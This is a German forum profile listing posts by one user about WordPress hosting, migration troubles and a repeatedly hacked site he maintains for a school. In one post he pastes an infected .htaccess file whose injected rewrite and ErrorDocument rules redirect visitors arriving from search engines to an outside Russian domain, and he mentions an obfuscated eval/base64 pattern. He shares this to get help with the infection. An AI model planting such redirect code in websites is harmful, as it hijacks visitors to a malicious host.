Beiträge von Jannemann23

    Hallo,

    finde ein Website ziemlich gut von der Gestaltung her. Ich weiß die Site läuft auf Wordpress und normalerweise finde ich schnell mit http://www.whatwpthemeisthat.com raus, welche Theme von welchem Anbieter verwendet wird. Bei der Seite http://www.dinahpannos.at/ werden nur die Details des Webdesigners angezeigt, als hätte er es selber programmiert - nicht unmöglich, aber nicht sehr wahrscheinlich.

    Kann man es verstecken, dass das premium theme angezeigt wird?
    Weiß jemand was hier verwendet werden könnte? Studiopress mit einem Childtheme?

    Danke schon mal, wenn jemand eine Idee hat!! :wink::wink:
    LG!!

    Ok, habe den das ganze Verzeichnis rüber kopiert auf eine andere Domain beim alten Server die ich noch hatte. Das hat mit den zwei DB einträgen sofort funktioniert. Jetzt kann ich mit dem Plugin Dublicator das ganze für den neuen Server als Paket vorbereiten. Klassischer Umzug aus einen "einfachen" Backup der Daten und der DB funktionierte in letzter Zeit nicht mehr wirklich... habe nie heraus gefunden woran es lag. Mit dem Dublicator ist es super, auch wenn man beim "einpacken" einiges erst mal ausschließen muss (Uploads, Gallery) damit der Vorgang nicht abbricht... diese kopiert man hinterher wieder per ftp dazu... meine Lehre daraus: immer erst mit der Seite auf eine Subdomain des neuen Servers umziehen bevor man die Domain transferiert... andersrum ist richtig blöd... :)

    Danke nochmal!!
    LG

    Hallo,

    schon mal danke für die Antworten. Kann schon auf alle Daten zugreifen über myphp. Nur würde ich gerne noch einmal wie gewohnt ins Wortpress einsteigen.
    Versuche halt irgendwie auf die wp-Login.php zuzugreifen nun da die ursprüngliche Domain transferiert wurde. Die IP habe ich - nur weiß ich nicht durch was ich die ursprünglich Domain ersetzen muss, nun das die Domain weg ist. Ich denke durch die Standard Subdomain... da bin ich aber anscheinend zu blöd die ausfindig zu machen. Bei Google finde ich auch nichts über "GoDaddy Standard Subdomain finden" o.ä. ...
    Nie wieder umziehen.... grrr...

    LG!!
    Jan

    Hi Leute,

    ich hatte einen laufenden Wordpress Blog mit einer Domain alles bei GoDaddy. Jetzt wollte ich mit der Seite und der Domain umziehen und habe vorher natürlich alles brav gebackupt. Die Domain ist nun bereits transferiert zum neuen Host. Nun müsste ich unbedingt noch mal auf das alte Wordpress zugreifen. Logischerweise funktioniert der alte Login http://domain.at/wp-login.php ja nicht mehr, da die Domain ja schon transferiert ist. Ich frage mich nun ob ich ohne die Domain noch auf das alte am alten Server vorhandene Wordpress zugreifen kann. Oder geht das ohnehin nicht, da auch in der DB immer auf die Domain verwiesen wird...
    Ist wahrscheinlich eine ziemlich dämliche Frage...

    Danke trotzdem!! :)

    LG!
    Jan

    Hey super, danke für die Antworten. Finde es toll wenn sich Zeit genommen wird auch für nicht so ganz fortgeschrittene Fragen :-) Aber ich habe wirklich nichts gefunden und evt. stellt sich jemand anders ja auch diese Frage irgendwann. Liebe Grüße!! Jan

    Hallo,

    habe jetzt schon hin und hergegoogelt, ist aber nicht einfach da ein gutes Suchergebnis zu bekommen, weil die Suchbegriffe nur zu Hostingprovidern führen. Die Frage ist vielleicht dämlich, aber wie macht ihr das mit Seiten von Kunden und der Domain. Lasst ihr die Kunden Ihre Domain sichern und ihr eigenes Hosting-Paket abschließen, oder hostet ihr die Seite auf einem Eurer Pakete und sichert die Domain auf Euren Namen. Oder Kunde (Domain) und Ihr installiert die Seite in einem Eurer Hosting Pakete?

    Also was ist "gängig"? :confused:
    Sorry, aber ich habe wirklich nichts zu dieser Fragestellung gefunden.

    Danke schon mal für jeden Kommentar!
    LG!
    Jan

    Kurz vor dem Ziel...es ist zum Mäuse melken

    Vermute schwer, dass der Umzug so mühsam ist, weil ich BulletProofSecurity am Blog installiert habe.
    Jetzt habe ich alles mit dem MySQLDumper exportiert und will am neuen Server die Sicherungsdatei Wiederherstellen und bekomme ich die Meldung:

    MySQL-ERROR
    MySQL meldet:
    Access denied for user 'Jan_fkc01use'@'localhost' to database 'information_schema'
    Fehler bei der Anfrage:
    DROP TABLE IF EXISTS `xxxxwp_bpspro_login_security`;
    DROP TABLE IF EXISTS `xxxx2wp_bpspro_login_security`; -> Access denied for user 'Jan_fkc01use'@'localhost' to database 'information_schema'

    Kann es sein, dass die Tabellen noch irgendwie durch die BulletProofSecurity geschützt sind? :confused::?
    BPS war mir schon immer irgendwie suspekt... :)

    Liebe Grüße und danke schon mal für jede Idee!!
    Jan

    Hallo,

    die Suchfunktion hat nichts ergeben. In allen Instruktionen steht, bei einem Umzug exportiert man die DB Tabellen mittels Export und dann Import beim neuen Host. Kann das auch mit dem php Sicherungsassistenten geschehen und dann mit der Wiederherstellen-Funktion desselben beim neuen Host? (Export Funktion beim alten Host funktioniert irgendwie nicht) Jedenfalls bekomme ich die Site nach dem Umzug nicht zum laufen... evtl. liegt es ja daran..

    Kann da jemand was zu sagen?

    Danke schon mal vielmals!!

    LG!
    Jan

    Und wenn die (wer auch immer) Zugang zu meinem Wordpress haben (und somit auch zur Datenbank - da ja die zugangsdaten in der config stehen) können "die" noch irgendeinen Schadcode beim Host selber hinterlegen? Muss nicht alles von denen weg sein, wenn ich per filezilla ftp das ganze root verzeichnis lösche UND die DB Tabellen im PHP Admin lösche?! *verwirr sei*

    :?

    Was mir auch noch nicht klar ist, wenn ich auch alle Tabellen in der SQL Datenbank gelöscht habe, wie kann der Schadcode in der DB liegen?

    Liebe Grüße!!

    ...

    Danke Dieter!

    Wenn ich Xampp installiere funktioniert Xampp als quasi "Web Host" auf meinem Rechner (wenn dieser an ist)?

    Wie lasse ich in den downgeloadeten Datenbank Tabellen nach dem Schadcode suchen? Mit dem normalen Virenscanner?

    Lg
    Jan

    Nochmaliger Versuch...

    Also folgendes:
    Habe per Filezilla das komplette Rootverzeichnis gelöscht - tutti completti - und Wordpress 3.3.2 ungezipt hochgeladen - quasi ready to install

    und schwupps ist schon wieder die .htaccess da mit dem code, der auf der russische Seite routet...

    daraus schließe ich: der Code muss immer wieder eingeschleust werden, entweder vom Server aus, oder von meinem Rechner (Client)

    am I wrong?!
    am I verzweifelt -> definately yes

    :(

    und weiter gehts...

    Hallo allerseits!

    Danke noch malig für die Antworten! Sorry wenn ich länger brauche um zu Antworten, aber mit meinem bescheidenen Wissen in diesem Feld dauert das „Verarbeiten“ der guten Informationen hier ein wenig! [FONT=Wingdings][FONT=Wingdings]J[/FONT][/FONT]

    Das dieses „Silence is golden“ dazu gehört ist schon mal beruhigend!

    r23 – ja, hatte wirklich alles vom Server geschmissen. Log Files anschauen klingt gut, diese sind mit meinem Zugang auf den Server aber nicht auffindbar... Ist ein wenig „unglücklich“ die Situation – mache die Site für eine Kambodschanische Schule. Welche Zusätzlichen Infos wären denn hilfreich? Damit will ich nicht geizen ;)

    • Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e
    • MySQL-Client-Version: 5.0.32
    • PHP Erweiterung: mysql


    Und ich denke das mit dem Server ist derzeit auch eines meiner Hauptprobleme
    Der Server nennt sich supremecenter104.com und ich habe einen User+Passwort bekommen. Ehrlich gesagt, keine Ahnung ob dieses supremecenter.com wirklich seriös ist. Was macht das auf euch für einen Eindruck?
    Komme da nur ins PHPAdmin + ich habe die FTP Zugangsdaten. Habe die Seite von jemanden übernommen, dem die Domain und auch das Hostingpaket gehört und den muss ich auch immer anschreiben zwecks Passwortänderungen etc. Würde der Schule auch vorschlagen zu wechseln auf einen „sichereren“ Server, aber der Typ hat sich aber die Domain der Schule Khmerchild.org gesichert und ich weiß gar nicht ob der die hergibt – abgesehen davon, dass ich mich erst mal erkundigen müsste, wie ich die Domain auf einem anderen Hostpaket nutzen kann – kenne nur die gesamtpakete zB von GoDaddy wo die Domain dabei ist… kann man die Domain einfach übernehmen? Oh man…

    Zu eval(...b.a.se6.4_de.code -> das müsste der Expoid Scanner doch finden oder? Ich mein, der Entwickler des PlugIns macht sich hoffentlich auch seine Gedanken oder? Oder doch nicht? [FONT=Wingdings][FONT=Wingdings]J[/FONT][/FONT]

    Timthumb: timthumb.php ist keine auf meinem Server…und war auch nicht in den alten Dateien die vorher oben waren…

    Zum Theme: Das habe ich mit der Artisteer Software erstellt… Wie sicher das ist weiß ich nicht… Sollte aber schon sicher sein…Hatte aber auch schon die Idee alles noch einmal frisch aufzuspielen ohne das Theme und mal zu schauen ob es dann weg ist. Kann man heraus finden ob ein Theme sicher ist?!


    Habe jetzt gerade noch mal in die .htaccess geschaut und da steht auf einmal folgendes:
    (Die .htaccess hat aber die ganze Zeit nur 444 also die Leseberechtigung!!?? – das heißt das Script ändert auch die Rechte der Datei oder?!)

    ________________________
    <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://key-midi.ru/lambada?2 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://key-midi.ru/lambada?2 [R=301,L]
    </IfModule>

    # BULLETPROOF PRO 5.D DEFAULT .HTACCESS

    # If you edit the line of code above you will see error messages on the BPS Security Status page
    # WARNING!!! THE default.htaccess FILE DOES NOT PROTECT YOUR WEBSITE AGAINST HACKERS
    # This is a standard generic htaccess file that does NOT provide any website security
    # The DEFAULT .HTACCESS file should be used for testing and troubleshooting purposes only

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    ErrorDocument 400 http://key-midi.ru/lambada?2
    ErrorDocument 401 http://key-midi.ru/lambada?2 ErrorDocument 403 http://key-midi.ru/lambada?2 ErrorDocument 404 http://key-midi.ru/lambada? ErrorDocument 500 http://key-midi.ru/lambada?2 _____________________________________________________
    Wie und wo in der PHP ist denn das Script versteckt . Und wie haben die es auf den Leeren Server wieder bekommen ..

    @infected: Werde das mit der kapersky rescue cd auch mal probieren…

    Das kann noch was werden …
    Oje..

    Danke aber!!!!
    Lg